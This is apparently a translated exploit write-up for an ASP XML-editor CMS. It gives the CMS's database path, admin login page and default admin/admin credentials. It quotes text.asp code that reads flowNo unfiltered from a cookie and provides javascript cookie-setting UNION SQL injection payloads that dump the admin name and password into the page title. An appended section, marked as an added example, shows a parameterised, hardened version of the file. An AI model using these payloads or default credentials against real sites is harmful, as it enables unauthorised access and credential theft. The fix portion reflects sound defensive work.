Database path: xmlEditor/database/#####@datas.mdb
Admin backend: xmleditor/login.asp, admin/admin
Guestbook database: guestbook/db/sywl.asp

Cookie injection vulnerability

File: xml/text.asp

Code:
--------------------------
<!--#include file="../conn.asp"-->
<%
' conn.asp contains the filtering for GET and POST input, but cookies are ignored
flowNo = Request("flowNo") ' Request() does not read only GET and POST; it also reads cookies
If flowNo <> "" Then ' if flowNo is not empty, continue
    Set rs = Server.CreateObject("ADODB.RecordSet")
    ' flowNo is concatenated straight into the query (the injection point)
    rs.Source = "select * from xmlContent where flowNo=" & flowNo
    rs.Open rs.Source, conn
    ' XML output; the leaked information appears in <title>
    Response.Write "<?xml version='1.0' encoding='utf-8'?>" & Chr(13)
    Response.Write "<main>" & Chr(13)
    Response.Write "<title><![CDATA["
    Response.Write rs("tx")
    Response.Write "]]></title>" & Chr(13)
    Response.Write "<text><![CDATA["
    Response.Write rs("description")
    Response.Write "]]></text>" & Chr(13)
    rs.Close
    Set rs = Nothing
    conn.Close
    Set conn = Nothing
    Response.Write "</main>"
End If
%>
--------------------------

In fact, this cookie injection vulnerability also exists in the new.asp file in the root directory, but it is inconvenient to use there because of a custom redirect to the home page. The text.asp file has no redirect, so it is the convenient one to use.

EXP:
javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminname from XmlAdmin"));
javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminpwd from XmlAdmin"));

PS: note that the result of this EXP does not show in the page body. The page is blank, and the account and password are displayed in the title, that is, the <title> element. Please observe carefully.
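
A hardened form of text.asp, as an added example that is not part of the original page or the CMS's own code. It assumes `conn` from conn.asp is an open ADODB.Connection, that flowNo is a numeric column, and that legitimate callers send flowNo in the query string; the helper names IsFlowNo and CData are hypothetical.

```asp
<!--#include file="../conn.asp"-->
<%
' Added example, not the CMS's own code. Assumes conn is an open
' ADODB.Connection and that xmlContent.flowNo is a numeric column.
Const adInteger = 3     ' ADO DataTypeEnum value
Const adParamInput = 1  ' ADO ParameterDirectionEnum value

' Accept 1 to 9 decimal digits only, so CLng cannot overflow or see SQL text.
Function IsFlowNo(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsFlowNo = re.Test(s)
End Function

' Split any "]]>" in stored text so it cannot close the CDATA section early.
Function CData(v)
    CData = "<![CDATA[" & Replace(v & "", "]]>", "]]]]><![CDATA[>") & "]]>"
End Function

Dim flowNo, cmd, rs
' Read one explicit collection so a cookie can no longer supply the value.
' Assumption: legitimate callers pass flowNo in the query string.
flowNo = Trim(Request.QueryString("flowNo"))
If Not IsFlowNo(flowNo) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
' The value is bound as a typed parameter, never concatenated into the SQL.
cmd.CommandText = "select tx, description from xmlContent where flowNo = ?"
cmd.Parameters.Append cmd.CreateParameter("flowNo", adInteger, adParamInput, , CLng(flowNo))
Set rs = cmd.Execute

Response.ContentType = "text/xml"
Response.Write "<?xml version='1.0' encoding='utf-8'?>" & Chr(13)
Response.Write "<main>" & Chr(13)
If Not rs.EOF Then
    Response.Write "<title>" & CData(rs("tx").Value) & "</title>" & Chr(13)
    Response.Write "<text>" & CData(rs("description").Value) & "</text>" & Chr(13)
End If
rs.Close : Set rs = Nothing
conn.Close : Set conn = Nothing
Response.Write "</main>"
%>
```

The same change applies to new.asp, which the page says has the same flaw; extending the conn.asp filter to cover Request.Cookies is a second layer, not a substitute for the bound parameter.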